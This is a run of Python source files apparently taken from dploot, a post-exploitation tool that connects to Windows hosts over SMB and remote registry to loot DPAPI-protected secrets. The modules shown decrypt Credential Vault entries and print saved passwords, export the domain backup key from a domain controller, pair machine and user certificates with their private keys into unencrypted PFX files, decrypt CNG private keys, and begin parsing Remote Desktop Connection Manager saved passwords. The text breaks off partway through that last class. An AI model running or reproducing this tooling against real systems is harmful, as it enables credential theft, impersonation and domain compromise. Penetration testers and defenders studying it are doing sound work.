        sccm_task = []
        sccm_collection = []
        try:
            if use_wmi:
                sccm_cred, sccm_task, sccm_collection = self.wmi_collect_sccm_secrets()
            else:
                objectfile = self.conn.readFile(
                    self.share,
                    self.sccm_objectdata_filepath,
                    bypass_shared_violation=True,
                    looted_files=self.looted_files
                )
                if objectfile is not None and len(objectfile) > 0:
                    sccm_cred, sccm_task, sccm_collection = self.parse_sccm_objectfile(
                        objectfile
                    )
        except Exception as e:
            if logging.getLogger().level == logging.DEBUG:
                import traceback

                traceback.print_exc()
                logging.debug(str(e))
        return sccm_cred, sccm_task, sccm_collection



import logging
import ntpath
from typing import Any, List, Optional, Callable
from binascii import hexlify

from impacket.dcerpc.v5.dtypes import RPC_SID
from impacket.dpapi import (
    VAULT_INTERNET_EXPLORER,
    VAULT_WIN_BIO_KEY,
    VAULT_NGC_ACCOOUNT,
)

from dploot.triage import Triage
from dploot.lib.dpapi import decrypt_vcrd, decrypt_vpol, find_masterkey_for_vpol_blob
from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target
from dploot.lib.utils import is_guid
from dploot.triage.masterkeys import Masterkey


class VaultCred:
    def __init__(
        self,
        winuser,
        blob,
        vault_type: "VAULT_INTERNET_EXPLORER|VAULT_WIN_BIO_KEY|VAULT_NGC_ACCOOUNT| Any",
        username: Optional[str] = None,
        resource: Optional[str] = None,
        password: Optional[str] = None,
        sid: Optional[str] = None,
        friendly_name: Optional[str] = None,
        biometric_key: Optional[str] = None,
        unlock_key: Optional[str] = None,
        IV: Optional[str] = None,
        cipher_text: Optional[str] = None,
    ):
        self.blob = blob
        self.winuser = winuser
        if vault_type is VAULT_INTERNET_EXPLORER:
            self.type = "Internet Explorer"
            self.username = username
            self.resource = resource
            self.password = password
        elif vault_type is VAULT_WIN_BIO_KEY:
            self.type = "WINDOWS BIOMETRIC KEY"
            self.sid = sid
            self.friendly_name = friendly_name
            self.biometric_key = biometric_key
        elif vault_type is VAULT_NGC_ACCOOUNT:
            self.type = "NGC LOCAL ACCOOUNT"
            self.sid = sid
            self.friendly_name = friendly_name
            self.unlock_key = unlock_key
            self.IV = IV
            self.cipher_text = cipher_text
        else:
            self.type = "None"

    def dump(self) -> None:
        self.blob.dump()
        if hasattr(self, "password") and self.password is not None:
            print("Decoded Password: %s" % self.password)
            print()

    def dump_quiet(self) -> None:
        if self.type == "Internet Explorer":
            print(
                f"[Internet Explorer] {self.resource} - {self.username}:{self.password}"
            )


class VaultsTriage(Triage):
    user_vault_generic_path = [
        "Users\\%s\\AppData\\Local\\Microsoft\\Vault",
        "Users\\%s\\AppData\\Roaming\\Microsoft\\Vault",
    ]
    system_vault_generic_path = [
        "Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Vault",
        "Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Vault",
        "Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Microsoft\\Vault",
        "Windows\\ServiceProfiles\\LocalService\\AppData\\Roaming\\Microsoft\\Vault",
        "Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Microsoft\\Vault",
        "Windows\\ServiceProfiles\\NetworkService\\AppData\\Roaming\\Microsoft\\Vault",
    ]
    share = "C$"
    vpol_filename = "Policy.vpol"

    def __init__(
        self,
        target: Target,
        conn: DPLootSMBConnection,
        masterkeys: List[Masterkey],
        per_vault_callback: Callable = None,
        false_positive: List[str] | None = None
    ) -> None:
        super().__init__(
            target, 
            conn, 
            masterkeys=masterkeys, 
            per_loot_callback=per_vault_callback, 
            false_positive=false_positive
        )
        self._users = None

    def triage_system_vaults(self) -> List[VaultCred]:
        vaults_creds = []
        vault_dirs = self.conn.listDirs(self.share, self.system_vault_generic_path)
        for system_vault_path, system_vault_dir in vault_dirs.items():
            if system_vault_dir is not None:
                vaults_creds += self.triage_vaults_folder(
                    user="SYSTEM",
                    vaults_folder_path=system_vault_path,
                    vaults_folder=system_vault_dir,
                )
        return vaults_creds

    def triage_vaults(self) -> List[VaultCred]:
        vaults_creds = []
        for user in self.users:
            try:
                vaults_creds += self.triage_vaults_for_user(user)
            except Exception as e:
                if logging.getLogger().level == logging.DEBUG:
                    import traceback

                    traceback.print_exc()
                logging.debug(str(e))
        return vaults_creds

    def triage_vaults_for_user(self, user: str) -> List[VaultCred]:
        vaults_creds = []
        vault_dirs = self.conn.listDirs(
            self.share, [elem % user for elem in self.user_vault_generic_path]
        )
        for user_vault_path, user_vault_dir in vault_dirs.items():
            if user_vault_dir is not None:
                vaults_creds += self.triage_vaults_folder(
                    user=user,
                    vaults_folder_path=user_vault_path,
                    vaults_folder=user_vault_dir,
                )
        return vaults_creds

    def triage_vaults_folder(
        self, user, vaults_folder_path, vaults_folder
    ) -> List[VaultCred]:
        vaults_creds = []
        for d in vaults_folder:
            if is_guid(d.get_longname()) and d.is_directory() > 0:
                vault_dirname = d.get_longname()
                vault_directory_path = ntpath.join(vaults_folder_path, vault_dirname)
                logging.debug(
                    f"Found Vault Directory: \\\\{self.target.address}\\{self.share}\\{vault_directory_path}\n"
                )

                # read vpol blob
                vpol_filepath = ntpath.join(vault_directory_path, self.vpol_filename)
                vpolblob_bytes = self.conn.readFile(self.share, vpol_filepath, looted_files=self.looted_files)
                vpol_keys = []
                if vpolblob_bytes is not None and self.masterkeys is not None:
                    masterkey = find_masterkey_for_vpol_blob(
                        vpolblob_bytes, self.masterkeys
                    )
                    if masterkey is not None:
                        vpol_decrypted = decrypt_vpol(vpolblob_bytes, masterkey)
                        if vpol_decrypted["Key1"]["Size"] > 0x24:
                            vpol_keys.append(
                                hexlify(vpol_decrypted["Key2"]["bKeyBlob"])
                            )
                            vpol_keys.append(
                                hexlify(vpol_decrypted["Key1"]["bKeyBlob"])
                            )
                        else:
                            vpol_keys.append(
                                hexlify(
                                    vpol_decrypted["Key2"]["bKeyBlob"]["bKey"]
                                ).decode("latin-1")
                            )
                            vpol_keys.append(
                                hexlify(
                                    vpol_decrypted["Key1"]["bKeyBlob"]["bKey"]
                                ).decode("latin-1")
                            )
                    else:
                        logging.debug("Could not decrypt...")

                # read vrcd blob
                vault_dir = self.conn.remote_list_dir(self.share, vault_directory_path)
                for file in vault_dir:
                    filename = file.get_longname()
                    if (
                        filename != self.vpol_filename
                        and filename not in self.false_positive
                        and file.is_directory() == 0
                        and filename[-4:].lower() == "vcrd"
                    ):
                        vrcd_filepath = ntpath.join(vault_directory_path, filename)
                        vrcd_bytes = self.conn.readFile(self.share, vrcd_filepath, looted_files=self.looted_files)
                        if (
                            vrcd_bytes is not None
                            and filename[-4:].lower() in ["vsch", "vcrd"]
                            and len(vpol_keys) > 0
                        ):
                            vault = decrypt_vcrd(vrcd_bytes, vpol_keys)
                            try:
                                if isinstance(
                                    vault,
                                    (
                                        VAULT_INTERNET_EXPLORER,
                                        VAULT_WIN_BIO_KEY,
                                        VAULT_NGC_ACCOOUNT,
                                    ),
                                ):
                                    vault_cred = None
                                    if isinstance(vault, VAULT_INTERNET_EXPLORER):
                                        vault_cred = VaultCred(
                                            winuser=user,
                                            blob=vault,
                                            type=type(vault),
                                            username=vault["Username"].decode(
                                                "utf-16le"
                                            ),
                                            resource=vault["Resource"].decode(
                                                "utf-16le"
                                            ),
                                            password=vault["Password"].decode(
                                                "utf-16le"
                                            ),
                                        )
                                    elif isinstance(vault, VAULT_WIN_BIO_KEY):
                                        vault_cred = VaultCred(
                                            winuser=user,
                                            blob=vault,
                                            type=type(vault),
                                            sid=RPC_SID(
                                                b"\x05\x00\x00\x00" + vault["Sid"]
                                            ).formatCanonical(),
                                            friendly_name=vault["Name"].decode(
                                                "utf-16le"
                                            ),
                                            biometric_key=(
                                                hexlify(vault["BioKey"]["bKey"])
                                            ).decode("latin-1"),
                                        )
                                    elif isinstance(vault, VAULT_NGC_ACCOOUNT):
                                        # take non existing keys into account
                                        try:
                                            biometric_key = (
                                                hexlify(vault["BioKey"]["bKey"])
                                            ).decode("latin-1")
                                        except KeyError:
                                            biometric_key = None
                                        try:
                                            unlock_key = hexlify(vault["UnlockKey"])
                                        except KeyError:
                                            unlock_key = None
                                        try:
                                            iv = hexlify(vault["IV"])
                                        except KeyError:
                                            iv = None
                                        try:
                                            cipher_text = hexlify(vault["CipherText"])
                                        except KeyError:
                                            cipher_text = None

                                        vault_cred = VaultCred(
                                            winuser=user,
                                            blob=vault,
                                            type=type(vault),
                                            sid=RPC_SID(
                                                b"\x05\x00\x00\x00" + vault["Sid"]
                                            ).formatCanonical(),
                                            friendly_name=vault["Name"].decode(
                                                "utf-16le"
                                            ),
                                            biometric_key=biometric_key,
                                            unlock_key=unlock_key,
                                            IV=iv,
                                            cipher_text=cipher_text,
                                        )
                                    if vault_cred is not None:
                                        vaults_creds.append(vault_cred)
                                        if self.per_loot_callback is not None:
                                            self.per_loot_callback(vault_cred)
                                else:
                                    logging.debug(
                                        "Vault decrypted but unknown data structure:"
                                    )
                            except Exception as e:
                                # report the exception, and continue the for loop
                                if logging.getLogger().level == logging.DEBUG:
                                    import traceback

                                    traceback.print_exc()
                                logging.debug(
                                    f"{e!s} while parsing vault:{vault.__class__} {vault.__dict__}"
                                )
        return vaults_creds

    @property
    def users(self) -> List[str]:
        if self._users is not None:
            return self._users

        self._users = self.conn.list_users(self.share)

        return self._users


import argparse
import logging
from binascii import hexlify
import sys
from typing import Callable, Tuple

from dploot.lib.target import Target, add_target_argument_group
from dploot.lib.smb import DPLootSMBConnection
from dploot.triage.backupkey import BackupkeyTriage

NAME = "backupkey"


class BackupkeyAction:
    def __init__(self, options: argparse.Namespace) -> None:
        self.options = options
        self.target = Target.from_options(options)

        self.conn = None
        self._is_admin = None
        self.dce = None
        self.outputfile = None
        self.legacy = self.options.legacy

        if self.options.outputfile is not None and self.options.outputfile != "":
            self.outputfile = self.options.outputfile
        else:
            self.outputfile = "key.pvk"

    def connect(self) -> None:
        self.conn = DPLootSMBConnection(self.target)
        if self.conn.connect() is None:
            logging.error("Could not connect to %s" % self.target.address)
            sys.exit(1)
        if self.conn.local_session:
            logging.error("Backup key is not implemented with LOCAL target.")
            sys.exit(1)

    def run(self) -> None:
        self.connect()
        logging.info(
            "Connected to {} as {}\\{} {}\n".format(
                self.target.address,
                self.target.domain,
                self.target.username,
                ("(admin)" if self.is_admin else ""),
            )
        )
        triage = BackupkeyTriage(target=self.target, conn=self.conn)
        backupkey = triage.triage_backupkey()
        if backupkey.backupkey_v1 is not None and self.legacy:
            if not self.options.quiet:
                print("Legacy key:")
                print("0x%s" % hexlify(backupkey.backupkey_v1).decode("latin-1"))
                print("\n")
            logging.info("Exporting key to file {}".format(self.outputfile + ".key"))
            open(self.outputfile + ".key", "wb").write(backupkey.backupkey_v1)
        if not self.options.quiet:
            print("[DOMAIN BACKUPKEY V2]")
            backupkey.pvk_header.dump()
            print(
                "PRIVATEKEYBLOB:{%s}"
                % (hexlify(backupkey.backupkey_v2).decode("latin-1"))
            )
            print("\n")
        logging.critical(
            f"Exporting domain backupkey to file {self.outputfile}"
        )
        open(self.outputfile, "wb").write(backupkey.backupkey_v2)

    @property
    def is_admin(self) -> bool:
        if self._is_admin is not None:
            return self._is_admin

        self._is_admin = self.conn.is_admin()
        return self._is_admin


def entry(options: argparse.Namespace) -> None:
    a = BackupkeyAction(options)
    a.run()


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(NAME, help="Backup Keys from domain controller")

    group = subparser.add_argument_group("backupkey options")

    group.add_argument(
        "-outputfile",
        action="store",
        help=("Export keys to specific filename (default key.pvk)"),
    )

    group.add_argument(
        "-legacy", action="store_true", help=("Get also backupkey v1 (legacy)")
    )

    add_target_argument_group(subparser)

    return NAME, entry



import hashlib
import logging
import ntpath
import os
from typing import Dict, List, Tuple, Callable
from dataclasses import dataclass

from impacket.dcerpc.v5 import rrp
from impacket.system_errors import ERROR_NO_MORE_ITEMS
from impacket.winregistry import Registry

from Cryptodome.PublicKey import RSA
from cryptography import x509
from cryptography.hazmat._oid import ExtensionOID
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.asymmetric.types import PrivateKeyTypes
from cryptography.hazmat.primitives.serialization import (
    Encoding,
    NoEncryption,
    pkcs12,
    PublicFormat,
    load_der_private_key,
)

from pyasn1.codec.der import decoder
from pyasn1.type.char import UTF8String

from dploot.triage import Triage
from dploot.lib.crypto import CERTBLOB
from dploot.lib.dpapi import decrypt_privatekey, find_masterkey_for_privatekey_blob
from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target
from dploot.lib.utils import is_certificate_guid
from dploot.triage.masterkeys import Masterkey

PRINCIPAL_NAME = x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")


@dataclass
class Certificate:
    winuser: str
    cert: x509.Certificate
    pkey: PrivateKeyTypes
    pfx: bytes
    username: str
    filename: str
    clientauth: bool

    def dump(self) -> None:
        print("Issuer:\t\t\t%s" % str(self.cert.issuer.rfc4514_string()))
        print("Subject:\t\t%s" % str(self.cert.subject.rfc4514_string()))
        print("Valid Date (UTC):\t%s" % self.cert.not_valid_before_utc)
        print("Expiry Date (UTC):\t%s" % self.cert.not_valid_after_utc)
        print("Extended Key Usage:")
        try:
            for i in self.cert.extensions.get_extension_for_oid(
                oid=ExtensionOID.EXTENDED_KEY_USAGE
            ).value:
                print(f"\t{i._name} ({i.dotted_string})")
        except x509.ExtensionNotFound:
            pass
        except (x509.DuplicateExtension, x509.UnsupportedGeneralNameType) as e:
            logging.debug(e)

        if self.clientauth:
            print("\t[!] Certificate is used for client auth!")

        print()
        print(self.cert.public_bytes(Encoding.PEM).decode("utf-8"))
        print()


class CertificatesTriage(Triage):
    system_capi_keys_generic_path = [
        "ProgramData\\Microsoft\\Crypto\\RSA",
        "Windows\\ServiceProfiles\\LocalService\\AppData\\Roaming\\Microsoft\\Crypto\\RSA",
    ]
    user_capi_keys_generic_path = [
        "Users\\%s\\AppData\\Roaming\\Microsoft\\Crypto\\RSA",
    ]
    user_mycertificates_generic_path = [
        "Users\\%s\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates"
    ]
    share = "C$"

    def __init__(
        self,
        target: Target,
        conn: DPLootSMBConnection,
        masterkeys: List[Masterkey],
        per_certificate_callback: Callable = None,
        false_positive: List[str] | None = None,
    ) -> None:
        super().__init__(
            target, 
            conn, 
            masterkeys=masterkeys, 
            per_loot_callback=per_certificate_callback, 
            false_positive=false_positive
        )
        self._users = None

    def triage_system_certificates(self) -> List[Certificate]:
        logging.getLogger("impacket").disabled = True
        if self.conn.local_session:
            self.conn.enable_localops(
                os.path.join(self.target.local_root, r"Windows/System32/config/SYSTEM")
            )
        else:
            self.conn.enable_remoteops()
        certificates = []
        pkeys = self.loot_privatekeys()
        logging.debug(f"Got {len(pkeys)} private key(s).")
        # stop here if no private key has been found.
        if not pkeys:
            return certificates
        certs = self.loot_system_certificates()
        logging.debug(f"Got {len(certs)} certificate(s).")
        if len(pkeys) > 0 and len(certs) > 0:
            certificates = self.correlate_certificates_and_privatekeys(
                certs=certs, private_keys=pkeys, winuser="SYSTEM"
            )
        return certificates

    def loot_system_certificates(self) -> Dict[str, x509.Certificate]:
        my_certificates_keys = (
            "SOFTWARE\\Microsoft\\SystemCertificates\\MY\\Certificates",
            "SOFTWARE\\Microsoft\\SystemCertificates\\My\\Certificates",
        )
        certificate_keys = []
        certificates = {}
        if self.conn.local_session:
            # open hive
            reg_file_path = os.path.join(
                self.target.local_root, r"Windows/System32/config/SOFTWARE"
            )
            reg = Registry(reg_file_path, isRemote=False)

            # open key
            for my_certificates_key in my_certificates_keys:
                key_path = my_certificates_key[8:]
                parentKey = reg.findKey(key_path)
                if parentKey is not None:
                    break
            else:
                logging.error(f"Key {key_path} not found in {reg_file_path}")
                return certificates
                
            # for each certificate subkey (such as Microsoft\SystemCertificates\MY\Certificates\3FD2...)
            for certificate_key in reg.enumKey(parentKey):
                # get 'Blob' value
                (_, certblob_bytes) = reg.getValue(
                    ntpath.join(key_path, certificate_key, "Blob")
                )
                logging.debug(
                    f"Found Certificates Blob: \\\\{self.target.address}\\{ntpath.join(my_certificates_key, certificate_key)}"
                )
                certblob = CERTBLOB(certblob_bytes)
                if certblob.der is None:
                    continue

                # store in certificates dict
                try:
                    cert = self.der_to_cert(certblob.der)
                    certificates[certificate_key] = cert
                except Exception as e:
                    logging.debug(f"Excetpion while converting certificate: {e!r}")
                    continue
            reg.close()
        else:
            my_certificates_key=my_certificates_keys[0]
            ans = rrp.hOpenLocalMachine(self.conn.remote_ops._RemoteOperations__rrp)
            regHandle = ans["phKey"]

            ans = rrp.hBaseRegOpenKey(
                self.conn.remote_ops._RemoteOperations__rrp,
                regHandle,
                my_certificates_key,
                samDesired=rrp.KEY_ENUMERATE_SUB_KEYS,
            )
            keyHandle = ans["phkResult"]
            i = 0
            while True:
                try:
                    enum_ans = rrp.hBaseRegEnumKey(
                        self.conn.remote_ops._RemoteOperations__rrp, keyHandle, i
                    )
                    certificate_keys.append(enum_ans["lpNameOut"][:-1])
                    i += 1
                except rrp.DCERPCSessionError as e:
                    if e.get_error_code() == ERROR_NO_MORE_ITEMS:
                        break
                except Exception as e:
                    import traceback

                    traceback.print_exc()
                    logging.error(str(e))
            rrp.hBaseRegCloseKey(self.conn.remote_ops._RemoteOperations__rrp, keyHandle)

            for certificate_key in certificate_keys:
                try:
                    regKey = my_certificates_key + "\\" + certificate_key
                    ans = rrp.hBaseRegOpenKey(
                        self.conn.remote_ops._RemoteOperations__rrp, regHandle, regKey
                    )
                    keyHandle = ans["phkResult"]
                    _, certblob_bytes = rrp.hBaseRegQueryValue(
                        self.conn.remote_ops._RemoteOperations__rrp, keyHandle, "Blob"
                    )
                    logging.debug(
                        f"Found Certificates Blob: \\\\{self.target.address}\\{regKey}"
                    )
                    certblob = CERTBLOB(certblob_bytes)
                    if certblob.der is not None:
                        try:
                            cert = self.der_to_cert(certblob.der)
                            certificates[certificate_key] = cert
                        except Exception as e:
                            logging.debug(f"Excetpion while converting certificate: {e!r}")
                    rrp.hBaseRegCloseKey(
                        self.conn.remote_ops._RemoteOperations__rrp, keyHandle
                    )
                except Exception as e:
                    if logging.getLogger().level == logging.DEBUG:
                        import traceback

                        traceback.print_exc()
                        logging.debug(str(e))
        return certificates

    def triage_certificates(self) -> List[Certificate]:
        certificates = []
        for user in self.users:
            try:
                certificates += self.triage_certificates_for_user(user=user)
            except Exception as e:
                if logging.getLogger().level == logging.DEBUG:
                    import traceback

                    traceback.print_exc()
                    logging.debug(str(e))
        return certificates

    def triage_certificates_for_user(self, user: str) -> List[Certificate]:
        certificates = []
        pkeys = self.loot_privatekeys(
            privatekeys_paths=[elem % user for elem in self.user_capi_keys_generic_path]
        )
        certs = self.loot_certificates(
            certificates_paths=[
                elem % user for elem in self.user_mycertificates_generic_path
            ]
        )
        if len(pkeys) > 0 and len(certs) > 0:
            certificates = self.correlate_certificates_and_privatekeys(
                certs=certs, private_keys=pkeys, winuser=user
            )
        return certificates

    def loot_privatekeys(
        self, privatekeys_paths: List[str] = system_capi_keys_generic_path
    ) -> Dict[str, Tuple[str, RSA.RsaKey]]:
        pkeys = {}
        pkeys_dirs = self.conn.listDirs(self.share, privatekeys_paths)
        for pkeys_path, pkeys_dir in pkeys_dirs.items():
            if pkeys_dir is not None:
                for d in pkeys_dir:
                    if (
                        d not in self.false_positive
                        and d.is_directory() > 0
                        and (
                            d.get_longname()[:2].upper() == "S-"
                            or d.get_longname().upper() == "MachineKeys".upper()
                        )
                    ):
                        sid = d.get_longname()
                        pkeys_sid_path = ntpath.join(pkeys_path, sid)
                        pkeys_sid_dir = self.conn.remote_list_dir(
                            self.share, path=pkeys_sid_path
                        )
                        for file in pkeys_sid_dir:
                            if file.is_directory() == 0 and is_certificate_guid(
                                file.get_longname()
                            ):
                                pkey_guid = file.get_longname()
                                filepath = ntpath.join(pkeys_sid_path, pkey_guid)
                                logging.debug(
                                    f"Found PrivateKey Blob: \\\\{self.target.address}\\{self.share}\\{filepath}"
                                )
                                pkey_bytes = self.conn.readFile(self.share, filepath, looted_files=self.looted_files)
                                if (
                                    pkey_bytes is not None
                                    and self.masterkeys is not None
                                ):
                                    try:
                                        masterkey = find_masterkey_for_privatekey_blob(
                                            pkey_bytes, masterkeys=self.masterkeys
                                        )
                                        if masterkey is not None:
                                            pkey = decrypt_privatekey(
                                                privatekey_bytes=pkey_bytes,
                                                masterkey=masterkey,
                                            )
                                            pkeys[
                                                hashlib.md5(
                                                    pkey.public_key().export_key("DER")
                                                ).hexdigest()
                                            ] = (pkey_guid, pkey)
                                    except Exception as e:
                                        logging.debug(
                                            f"Exception encountered in {__name__}: {e}."
                                        )
        return pkeys

    def loot_certificates(
        self, certificates_paths: List[str]
    ) -> Dict[str, x509.Certificate]:
        certificates = {}
        certificates_dir = self.conn.listDirs(self.share, certificates_paths)
        for cert_dir_path, cert_dir in certificates_dir.items():
            if cert_dir is not None:
                for cert in cert_dir:
                    if cert not in self.false_positive and cert.is_directory() == 0:
                        try:
                            certname = cert.get_longname()
                            certpath = ntpath.join(cert_dir_path, certname)
                            logging.debug(
                                f"Found Certificates Blob: \\\\{self.target.address}\\{self.share}\\{certpath}"
                            )
                            certbytes = self.conn.readFile(self.share, certpath, looted_files=self.looted_files)
                            certblob = CERTBLOB(certbytes)
                            if certblob.der is not None:
                                cert = self.der_to_cert(certblob.der)
                                certificates[certname] = cert
                                logging.debug(f"added cert {cert.subject}")
                        except Exception as e:
                            logging.debug(repr(e))
        return certificates

    def correlate_certificates_and_privatekeys(
        self,
        certs: Dict[str, x509.Certificate],
        private_keys: Dict[str, Tuple[str, RSA.RsaKey]],
        winuser: str,
    ) -> List[Certificate]:
        certificates = []
        for name, cert in certs.items():
            if (
                hashlib.md5(
                    cert.public_key().public_bytes(
                        Encoding.DER, PublicFormat.SubjectPublicKeyInfo
                    )
                ).hexdigest()
                in private_keys
            ):
                # Matching public and private key
                pkey = private_keys[
                    hashlib.md5(
                        cert.public_key().public_bytes(
                            Encoding.DER, PublicFormat.SubjectPublicKeyInfo
                        )
                    ).hexdigest()
                ]
                logging.debug(
                    f"Found match between {name} certificate and {pkey[0]} private key !"
                )
                key = load_der_private_key(pkey[1].export_key("DER"), password=None)
                pfx = self.create_pfx(key=key, cert=cert)
                # TODO CAN BE NULL self.get_id_from_certificate(certificate=cert)[1]
                username = self.get_id_from_certificate(certificate=cert)[1].replace(
                    "@", "_"
                )
                clientauth = False
                try:
                    ext=cert.extensions.get_extension_for_oid(oid=ExtensionOID.EXTENDED_KEY_USAGE)
                    for i in ext.value:
                        if i.dotted_string in [
                            "1.3.6.1.5.5.7.3.2",  # Client Authentication
                            "1.3.6.1.5.2.3.4",  # PKINIT Client Authentication
                            "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
                            "2.5.29.37.0",  # Any Purpose
                        ]:
                            clientauth = True
                            break
                except x509.ExtensionNotFound:
                    logging.debug('no extended key usage in certificate')
                except (x509.DuplicateExtension, x509.UnsupportedGeneralNameType) as e:
                    logging.debug(e)


                cert_object = Certificate(
                    winuser=winuser,
                    cert=cert,
                    pkey=key,
                    pfx=pfx,
                    username=username,
                    filename=name,
                    clientauth=clientauth,
                )
                certificates.append(cert_object)
                if self.per_loot_callback is not None:
                    self.per_loot_callback(cert_object)
        return certificates

    def der_to_cert(self, certificate: bytes) -> x509.Certificate:
        return x509.load_der_x509_certificate(certificate)

    def create_pfx(self, key: rsa.RSAPrivateKey, cert: x509.Certificate) -> bytes:
        return pkcs12.serialize_key_and_certificates(
            name=b"",
            key=key,
            cert=cert,
            cas=None,
            encryption_algorithm=NoEncryption(),
        )

    def get_id_from_certificate(self, certificate: x509.Certificate) -> Tuple[str, str]:
        try:
            san = certificate.extensions.get_extension_for_oid(
                ExtensionOID.SUBJECT_ALTERNATIVE_NAME
            )

            for name in san.value.get_values_for_type(x509.OtherName):
                if name.type_id == PRINCIPAL_NAME:
                    return (
                        "UPN",
                        decoder.decode(name.value, asn1Spec=UTF8String)[0].decode(),
                    )

            for name in san.value.get_values_for_type(x509.DNSName):
                return "DNS Host Name", name
        except Exception:
            pass

        return "", "SAN not found"

    @property
    def users(self) -> List[str]:
        if self._users is not None:
            return self._users

        self._users = self.conn.list_users(self.share)

        return self._users



from binascii import hexlify
import logging
import ntpath
from typing import Callable, List

from dploot.lib.crypto import CNG_BLOB, CNG_PROPERTIES
from dploot.lib.dpapi import decrypt_blob, find_masterkey_for_blob
from dploot.lib.masterkey import Masterkey
from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target
from dploot.triage import Triage


class CngFile:
    def __init__(self, winuser: str, cng_blob: bytes):
        self.winuser = winuser
        self.cng_blob = CNG_BLOB(cng_blob)

        self.decrypted_private_props = None
        self.decrypted_private_key = None

    def decrypt_cng_private_properties(self, masterkeys: List[Masterkey]) -> CNG_PROPERTIES:
        masterkey = find_masterkey_for_blob(
            self.cng_blob["PrivateProperties"].rawData,
            masterkeys=masterkeys
        )
        if masterkey is not None:
            private_properties = decrypt_blob(
                blob_bytes=self.cng_blob["PrivateProperties"].rawData,
                masterkey=masterkey,
                entropy=b"6jnkd5J3ZdQDtrsu\x00"
            )

            self.decrypted_private_props = CNG_PROPERTIES(private_properties)
        
        return self.decrypted_private_props

    def decrypt_cng_private_key(self, masterkeys: List[Masterkey]) -> bytes:
        masterkey = find_masterkey_for_blob(
            self.cng_blob["PrivateKey"].rawData,
            masterkeys=masterkeys
        )
        if masterkey is not None:
            private_key = decrypt_blob(
                blob_bytes=self.cng_blob["PrivateKey"].rawData,
                masterkey=masterkey,
                entropy=b"xT5rZW5qVVbrvpuA\x00"
            )

            self.decrypted_private_key = private_key
        
        return self.decrypted_private_key

    def decrypt_cng_file(self, masterkeys: List[Masterkey]) -> bool:
        return (self.decrypt_cng_private_properties(masterkeys) is not None
                and 
                self.decrypt_cng_private_key(masterkeys) is not None)

    def dump(self):
        self.cng_blob.dump()
        if self.decrypted_private_props is not None:
            print()
            self.decrypted_private_props.dump()
        if self.decrypted_private_key is not None:
            print()
            print("Decrypted Private Key: %s" % hexlify(self.decrypted_private_key))
            print()

    def dump_quiet(self):
        if self.decrypted_private_key is not None:
            print("%s" % hexlify(self.decrypted_private_key))
        

class CngTriage(Triage):
    system_cng_keys_generic_path = [
        "ProgramData\\Microsoft\\Crypto\\Keys",
        "ProgramData\\Microsoft\\Crypto\\SystemKeys",
        "Windows\\ServiceProfiles\\LocalService\\AppData\\Roaming\\Microsoft\\Crypto\\Keys",
    ]
    user_cng_keys_generic_path = [
        "Users\\%s\\AppData\\Roaming\\Microsoft\\Crypto\\Keys",
    ]
    share = "C$"

    def __init__(
        self,
        target: Target,
        conn: DPLootSMBConnection,
        masterkeys: List[Masterkey],
        per_cng_callback: Callable = None,
        false_positive: List[str] | None = None,
    ) -> None:
        super().__init__(
            target, 
            conn, 
            masterkeys=masterkeys, 
            per_loot_callback=per_cng_callback, 
            false_positive=false_positive
        )
        self._users = None

    def triage_system_cng(self) -> List[CngFile]:
        cng_files = []
        cng_dirs = self.conn.listDirs(
            self.share, self.system_cng_keys_generic_path
        )
        for system_cng_path, system_cng_dir in cng_dirs.items():
            if system_cng_dir is not None:
                cng_files += self.triage_cng_folder(
                cng_folder_path=system_cng_path,
                cng_folder=system_cng_dir,
                winuser="SYSTEM",
            )
        return cng_files

    def triage_cng(self) -> List[CngFile]:
        cng_files = []
        for user in self.users:
            try:
                cng_files += self.triage_cng_for_user(user)
            except Exception as e:
                if logging.getLogger().level == logging.DEBUG:
                    import traceback
                    traceback.print_exc()
                    logging.debug(str(e))
        return cng_files

    def triage_cng_for_user(self, user: str) -> List[CngFile]:
        cng_files = []
        cng_files_path = self.user_cng_keys_generic_path[0] % user
        cng_files_dir = self.conn.remote_list_dir(self.share, cng_files_path)
        if cng_files_dir is not None:
            cng_files += self.triage_cng_folder(
                cng_folder_path=cng_files_path,
                cng_folder=cng_files_dir,
                winuser=user,
            )
        return cng_files

    def triage_cng_folder(
        self, cng_folder_path, cng_folder, winuser: str
    ) -> List[CngFile]:
        cng_files = []
        for cng_file in cng_folder:
            if cng_file.get_longname() not in self.false_positive:
                cng_filepath = ntpath.join(cng_folder_path, cng_file.get_longname())
                logging.debug(
                    f"Found CNG file: \\\\{self.target.address}\\{self.share}\\{cng_filepath}"
                )
                cng_bytes = self.conn.readFile(self.share, cng_filepath, looted_files=self.looted_files)
                cng_file = CngFile(winuser=winuser, cng_blob=cng_bytes)
                if cng_file.decrypt_cng_file(self.masterkeys):
                    cng_files.append(cng_file)
                    if self.per_loot_callback is not None:
                        self.per_loot_callback(cng_file)
        return cng_files
    @property
    def users(self) -> List[str]:
        if self._users is not None:
            return self._users

        self._users = self.conn.list_users(self.share)

        return self._users
                



import logging
from typing import Any, List, Tuple
import xml.etree.ElementTree as ET
import base64
from dataclasses import dataclass

from dploot.triage import Triage
from dploot.lib.dpapi import decrypt_blob, find_masterkey_for_blob
from dploot.lib.smb import DPLootSMBConnection
from dploot.lib.target import Target
from dploot.triage.masterkeys import Masterkey


@dataclass
class RDGProfile:
    profile_name: str
    username: str
    password: str


@dataclass
class RDGCredProfile(RDGProfile):
    def dump(self) -> None:
        print("[CREDENTIAL PROFILES]")
        print("\tProfile Name:\t%s" % self.profile_name)
        print("\tUsername:\t%s" % self.username)
        print("\tPassword:\t%s" % self.password.decode("latin-1"))
        print()

    def dump_quiet(self) -> None:
        print(
            "[RDG] {} - {}:{}".format(self.profile_name, self.username, self.password.decode("latin-1"))
        )


@dataclass
class RGDLogonProfile(RDGProfile):
    def dump(self) -> None:
        print("[LOGON PROFILES]")
        print("\tProfile Name:\t%s" % self.profile_name)
